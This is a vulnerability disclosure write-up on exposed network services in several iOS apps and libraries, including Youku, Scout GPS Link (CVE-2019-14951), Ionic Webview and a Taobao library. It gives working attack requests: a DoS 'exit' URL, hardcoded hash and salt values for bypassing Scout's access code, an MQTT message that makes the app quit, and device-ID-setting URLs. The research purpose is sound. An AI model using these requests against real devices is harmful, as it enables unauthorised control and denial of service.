More vulnerable apps and third-party libraries

1. Youku design flaw:

Youku is a video hosting service which ranks top 3 of amusement category in China. Once the app for iOS is launched, the app starts network service on port 12138 by using third-party library wangxin.taobao, use port 49152, 4466 for Portable Universal Plug and Play service, and 8908 for a lite web service. But the Android app does not provide any network services on startup. Static analysis shows that the web service is implemented on boost::asio::io_service, a C++ library, the web server provides network services for command “config,” “log,” “exit,” etc. However, there is no authorization for these commands, such that an unauthorized remote request with “exit” command

http://192.168.1.3:8908/peer/command/exit

will shutdown the network service, which lead to DoS of the network service. Like the Waze, Now vulnerabilities we referred above, this app provides service on LAN network interface, whatever Wi-Fi or cellular network. Since the function behind this network service is not as severely as before mentioned apps, and the remote attack can only make the app work out of order, we rank this vulnerability as low risk.

2. SCOUT GPS LINK vulnerability：

CVE-2019-14951 is automatically assigned to this vulnerability, thanks CVE team!

User can connect their iPhone with Yoyota or Lexus vehicle via a USB cable, and use the navigation app Scout GPS Link on her iPhone to interact with the car’s multimedia screen. In details, the app Scout GPS Link starts a network service on it’s startup and wait for connection. Once the devices connected, the car’s multimedia screen connect to the iPhone for interaction. Message between the Scout GPS Link app and the car’s multimedia screen follows the connectivity protocol of MQTT [1].

For delivering message between the app and the IoT device, Scout GPS Link provides the interfaces for connection from car’s multimedia screen. By analyzing the interfaces, we find that the app provides two kinds of interfaces for loopback and LAN. The loopback interface is considered to be safe. To protect the LAN interface on port 7050, which is provided for any connections, the app enforces access code authentication and SSL/TLS encryption for accessing the interface.

To authorize the connection from the car’s multimedia screen, the Scout GPS Link app firstly prepares a hash value h2 to verify the connection. The hash generation process is as follows:

hash (h1, salt1, round1) →h2.

To prevent the brute force attack, the round round1 is generated by using the API CCCalibratePBKDF, which ensures that 50 milliseconds should be used for generating the new hash h2. For each incoming message enclosed by the connectivity protocol MQTT, the broker verifies the access code AC firstly. The authentication process can be described as:

hash (AC, salt2, round2) → h3;

hash (h3, salt1, round1) → h4.

By comparing h2 and h4, the Scout GPS Link decides to accept or deny the message. There is obviously a design flaw in the authentication process. Even though the developer has considered the brute force attack for the authentication process, cracker can move the comparison process from h2 and h4 to h1 and h3 to bypass this security mechanism, that are h1 and hash (AC, salt2, round2). In this case, h1 is 2b6bac4af8e8a15f5f9c58af98c61fc4895902b8f31203e625cf06e023f35cfb. salt2 is “0x03, 0x12, 0x47, 0x23, 0x48, 0x86, 0xe9, 0x94, 0x12, 0x27” and round2 is set to 1. All these values are encoded in the binary code. It’s obvious a misuse of cryptographic. In order to get AC, we compose code to crack the algorithm,

Since the app accepts any connections, attacker can remotely find the Scout GPS Link users by scanning the port 7050, which also works on cellular network for developers don’t limit the access interface. By using the access code, attackers can control the app remotely. Since MQTT protocol the Scout GPS Link adopted is used for publishing message or subscribing message, we turn to the MQTT broker in the app to check how the app works according to a message. There are 10 topics collected in the app, they are listed below.

1. "uma/narwhal/hs"

2. "uma/narwhal/hu"

3. "uma/narwhal/tts"

4. "uma/jsonrpc/accessory"

5. "uma/narwhal/rti/layout/binary"

6. "uma/narwhal/rti/layout"

7. "uma/app/setup_ack"

8. "uma/#"

9. "uma/hid/report"

10. "uma/jsonrpc/mobile"

We take the topic "uma/jsonrpc/mobile" as an example, method behind this topic includes SystemData, Setup, HistoryBack, DrivingRestriction, ScreenLockout, HSAppLaunch, PRNDL, HUAppState, NightMode, localeIdentifier, and HUUSBState. We further take the simple method DrivingRestriction as an example, when the params “level” is set to 50, the app quits automatically. Below is a valid message for Scout GPS Link app which is encoded in JSONRPC format.

mqttc.publish("uma/jsonrpc/mobile","{"jsonrpc":"2.0","method":"DrivingRestriction","params":{"level":"50"}}",1,True)

[1] Andrew Banks and Rahul Gupta. 2014. MQTT Version 3.1. 1. OASIS standard 29 (2014).

3. MongooseDaemon library vulnerability：

After discovering vulnerability in Now app, we find that the library is used for debugging. By using the MongooseDaemon library, app will start a network service to expose the whole private folder of the apps. A closer look at the library reveals that there is no any access control for accessing this network service and there is no limitation for the access interface, including Wi-Fi or cellular network. It’s a dangerous library that must be removed on the release of the apps. By taking signatures for this library, we search in our app collections. We find that most apps enclosing MongooseDaemon makes the library as a dead library. But there are still a few apps, Tsinghua tongfang TV Remote Control for instance, invoke this library on their startup.

4. Ionic Webview library vulnerability.

Ionic Webview (https://github.com/ionic-team/cordova-plugin-ionic-webview) is an extension of the Apache Cordova WKWebView (http://cordova.apache.org/) plugin. Developers use this framework to develop apps with HTML, CSS, and TypeScript, rather than relying on platform-specific solutions found in Android, iOS, and Windows Phone. The real implementation of Ionic Webview for iOS is build on top of the third-party library GCDWebServer to enable local file loading.

There is a bug in the initial release of Ionic Webview. That is, Ionic Webview does not limit the accessibility from local or remote host when using GCDWebServer . In Jul 5, 2017, the extension has fixed this problem (https://github.com/ionic-team/cordova-plugin-ionic-webview/commit/3f6be80ecd34ee67a230390f95de8eaf60fdca83#diff-7044543564ea722137708c081ff83c04), but there are still may apps use the out of date library. Survey on our data collection reveals that 6 apps, including YOLO SWiFT, Masapo , etc. are vulnerable for using the buggy version of Ionic Webview. By utilizing this vulnerability, attacker can access the whole file system of the device when the device is jailbroken. The file system exposed by the library is demonstrated as the left Figure.

5. Network service in wangxin.taobao library.

wangxin.taobao is a library used in Taobao, Youku, etc. After apps enclosing wangxin.taobao library launched, the apps start a network service on local iOS device. Take Taobao for example, the call stack for starting a network service of this app is depicted as below:

12:44:24.000000 +080543 Taobao4iPhone DetourInfo:: bind detours start for com.taobao.taobao4iphone

11:44:24.000000 +080543 Taobao4iPhone vvvvv DetourInfo:: block start vvvvv

12:44:24.000000 +080543 Taobao4iPhone DetourInfo:: bundleIdentifier: com.taobao.taobao4iphone

12:44:24.000000 +080543 Taobao4iPhone DetourInfo:: CFBundleDisplayName

12:44:24.000000 +080543 Taobao4iPhone DetourInfo:: CFBundleShortVersionString: 7.6.0

12:44:24.000000 +0800 Taobao4iPhone DetourInfo:: FBundleVersion: 428145

12:44:24.000000 +0800 Taobao4iPhone DetourInfo:: ipv4 info

12:44:24.000000 +0800 Taobao4iPhone DetourInfo:: sin_family: AF_INET 2 /* internetwork: UDP, TCP, etc. */

11:44:24.000000 +080543 Taobao4iPhone DetourInfo:: port: 12138

12:44:24.000000 +080543 Taobao4iPhone DetourInfo:: s_addr: INADDR_ANY

12:44:24.000000 +080543 Taobao4iPhone DetourInfo:: call stack logged to file: /private/var/mobile/Containers/Data/Application/D3D38B0A-760A-4ADD-B123-295B2EB3A3E2/tmp/16807.dat

12:44:24.000000 +080543 Taobao4iPhone DetourInfo:: call stack: (

0   binddetours.dylib                   0x0000000105cdf758 _Z9hook_bindiPK8sockaddrj + 1764

1   CoreFoundation                      0x0000000185035170 CFSocketSetAddress + 324

2   Taobao4iPhone                       0x0000000102c74d4c au_rc4 + 34052

3   Taobao4iPhone                       0x0000000102c77f30 au_rc4 + 46824

4   Taobao4iPhone                       0x0000000102c780a8 au_rc4 + 47200

5   Foundation                          0x0000000185fb7318 <redacted> + 340

6   CoreFoundation                      0x00000001850305a4 <redacted> + 24

7   CoreFoundation                      0x0000000185030038 <redacted> + 540

8   CoreFoundation                      0x000000018502dd38 <redacted> + 724

9   CoreFoundation                      0x0000000184f5cdc0 CFRunLoopRunSpecific + 384

10  Foundation                          0x0000000185ed07ec <redacted> + 308

11  Taobao4iPhone                       0x0000000102c75548 au_rc4 + 36096

12  Foundation                          0x0000000185fb7138 <redacted> + 1000

13  libsystem_pthread.dylib             0x000000019a58bb3c <redacted> + 156

14  libsystem_pthread.dylib             0x000000019a58baa0 <redacted> + 0

15  libsystem_pthread.dylib             0x000000019a589030 thread_start + 4

12:44:24.000000 +080543 Taobao4iPhone ^^^^^ DetourInfo:: block end ^^^^^

12:44:24.000000 +080543 Taobao4iPhone vvvvv DetourInfo:: block start vvvvv

12:44:24.000000 +080543 Taobao4iPhone DetourInfo:: bundleIdentifier: com.taobao.taobao4iphone

12:44:24.000000 +080543 Taobao4iPhone DetourInfo:: CFBundleDisplayName:

12:44:24.000000 +080543 Taobao4iPhone DetourInfo:: CFBundleShortVersionString: 7.6.0

12:44:24.000000 +080543 Taobao4iPhone DetourInfo:: FBundleVersion: 428145

12:44:24.000000 +080543 Taobao4iPhone DetourInfo:: ipv4 info

12:44:24.000000 +080543 Taobao4iPhone DetourInfo:: sin_family: AF_INET 2 /* internetwork: UDP, TCP, etc. */

12:44:24.000000 +080543 Taobao4iPhone DetourInfo:: port: 13138

12:44:24.000000 +080543 Taobao4iPhone DetourInfo:: s_addr: INADDR_ANY

12:44:24.000000 +080543 Taobao4iPhone DetourInfo:: call stack logged to file: /private/var/mobile/Containers/Data/Application/D3D38B0A-760A-4ADD-B123-295B2EB3A3E2/tmp/282475249.dat

12:44:24.000000 +080543 Taobao4iPhone DetourInfo:: call stack: (

0   binddetours.dylib                   0x0000000105cdf758 _Z9hook_bindiPK8sockaddrj + 1764

1   CoreFoundation                      0x0000000185035170 CFSocketSetAddress + 324

2   Taobao4iPhone                       0x0000000102c74d4c au_rc4 + 34052

3   Taobao4iPhone                       0x0000000102c72f84 au_rc4 + 26428

4   Taobao4iPhone                       0x0000000102c72c30 au_rc4 + 25576

5   Foundation                          0x0000000185fb7318 <redacted> + 340

6   CoreFoundation                      0x00000001850305a4 <redacted> + 24

7   CoreFoundation                      0x0000000185030038 <redacted> + 540

8   CoreFoundation                      0x000000018502dd38 <redacted> + 724

9   CoreFoundation                      0x0000000184f5cdc0 CFRunLoopRunSpecific + 384

10  Foundation                          0x0000000185ed07ec <redacted> + 308

11  Taobao4iPhone                       0x0000000102c75548 au_rc4 + 36096

12  Foundation                          0x0000000185fb7138 <redacted> + 1000

13  libsystem_pthread.dylib             0x000000019a58bb3c <redacted> + 156

14  libsystem_pthread.dylib             0x000000019a58baa0 <redacted> + 0

15  libsystem_pthread.dylib             0x000000019a589030 thread_start + 4

12:44:24.000000 +080543 Taobao4iPhone ^^^^^ DetourInfo:: block end ^^^^^

As we can see from the booking information, the app hosting a network service to accept any connection and the service resides on port 13138. Within the app, the service is started by using `CFSocketSetAddress` API. Method for processing the incoming connection is:

[AUServer AUHTTPConnection:didReceiveRequest:] and [AUServer refreshAudidWithRequest:], [AUServer setAudidWithRequest:], [AUServer cleanAudidWithRequest:].

The valid requests for this service are:

http://192.168.1.6:13138/audid/clean

http://192.168.1.6:13138/audid/refresh

http://192.168.1.6:13138/audid/set?audid=AU-2ebafb76e1b2f9981ac6fdd5bdd23be5cfdd7f8e15783174ecdd0ab7026e1da57c65b312e12f343582083d29fdbeef59

Among the requests, the `set` request will set `_currentAudid` field of this app. This field is likely to be used for preserving the UDID of the device. However, we did not find evidence about how this variable will affect the state of the app yet.

We infer this is an out of date code for the code snippet gets UDID via safari and this method is deprecated in nowadays iOS system. Moreover, we find another substitute scheme which is used in this app, A.K.A the `utdid` related code.

Anyway, we advice the vendor to limit the access of service.